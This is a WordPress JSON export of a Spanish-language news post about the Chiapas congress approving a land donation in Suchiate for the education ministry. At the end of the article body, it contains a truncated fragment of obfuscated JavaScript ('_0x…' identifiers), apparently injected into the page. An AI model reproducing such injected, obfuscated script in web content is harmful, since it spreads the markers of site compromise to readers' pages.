{"id":4266,"date":"2022-08-10T03:53:43","date_gmt":"2022-08-10T03:53:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4266"},"modified":"2022-08-10T03:53:45","modified_gmt":"2022-08-10T03:53:45","slug":"aprueban-desincorporacion-de-predio-para-uso-y-destino-de-la-secretaria-de-educacion","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4266","title":{"rendered":"Aprueban desincorporaci\u00f3n de predio para uso y destino de la Secretar\u00eda de Educaci\u00f3n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0043.jpg\" alt=\"\" class=\"wp-image-4267\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0043.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0043-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0043-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220809-WA0043-310x205.jpg 310w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u2022 La Comisi\u00f3n Permanente brind\u00f3 un minuto de silencio por el sensible fallecimiento del licenciado Juan \u00d3scar Trinidad Palacios, magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura.<\/p>\n\n\n\n<p>\u2022 Previo al inicio de la sesi\u00f3n, las diputadas Mar\u00eda Roselia Jim\u00e9nez P\u00e9rez Cecilia L\u00f3pez S\u00e1nchez y Leticia M\u00e9ndez participaron en Conmemoraci\u00f3n del D\u00eda Internacional de los Pueblos Ind\u00edgenas.<\/p>\n\n\n\n<p>Tuxtla Guti\u00e9rrez, Chiapas a 09 de agosto de 2022.-En sesi\u00f3n extraordinaria, la Comisi\u00f3n Permanente presidida por la diputada Mar\u00eda De los \u00c1ngeles Trejo Huerta aprob\u00f3 el dictamen que de la Comisi\u00f3n de Hacienda relativo al expediente presentado por el ayuntamiento de Suchiate, Chiapas, por medio del cual solicita autorizaci\u00f3n para desincorporar del patrimonio municipal una superficie de predio r\u00fastico denominado \u201cEl Chaparral\u201d y enajenarlo -v\u00eda donaci\u00f3n- a favor del Gobierno del Estado de Chiapas a trav\u00e9s de la Secretar\u00eda de Educaci\u00f3n para uso y funcionamiento exclusivo del Centro de Atenci\u00f3n Tiple 47, ubicado en este municipio.<\/p>\n\n\n\n<p>Previo al an\u00e1lisis de los puntos que integraron el orden del d\u00eda, las diputadas: Mar\u00eda De los \u00c1ngeles Trejo Huerta, Mar\u00eda Roselia Jim\u00e9nez P\u00e9rez, Cecilia L\u00f3pez S\u00e1nchez y Leticia M\u00e9ndez participaron en Conmemoraci\u00f3n del D\u00eda Internacional de los Pueblos Ind\u00edgenas.<\/p>\n\n\n\n<p>Al hacer uso de la voz, las diputadas coincidieron en que se promulguen iniciativas para el respeto de los derechos de los pueblos ind\u00edgenas. As\u00ed como la preservaci\u00f3n de las lenguas ind\u00edgenas -las cu\u00e1les est\u00e1n en peligro de extinci\u00f3n, as\u00ed como se destine m\u00e1s presupuesto para las oficinas que atienden el tema de los pueblos originarios.&nbsp;<\/p>\n\n\n\n<p>En otro orden de ideas, fue turnada a la Comisi\u00f3n de Seguridad Social -para su an\u00e1lisis y dictamen- el oficio signado por Victoria Cecilia Flores P\u00e9rez secretar\u00eda general de gobierno, por medio del cual se remite a esta soberan\u00eda popular la iniciativa de decreto por el que se reforman las fracciones primera y quinta del art\u00edculo 36 de la Ley del Instituto de seguridad social de los trabajadores del Estado de Chiapas<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u2022 La Comisi\u00f3n Permanente brind\u00f3 un minuto de silencio por el sensible fallecimiento del licenciado Juan \u00d3scar Trinidad Palacios, magistrado presidente del Tribunal Superior de Justicia y del Consejo de la Judicatura. \u2022 Previo al inicio de la sesi\u00f3n, las diputadas Mar\u00eda Roselia Jim\u00e9nez P\u00e9rez Cecilia L\u00f3pez S\u00e1nchez y Leticia M\u00e9ndez participaron en Conmemoraci\u00f3n del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4267,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-4266","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4266","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4266"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4266\/revisions"}],"predecessor-version":[{"id":4268,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4266\/revisions\/4268"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4267"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4266"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4266"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4266"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}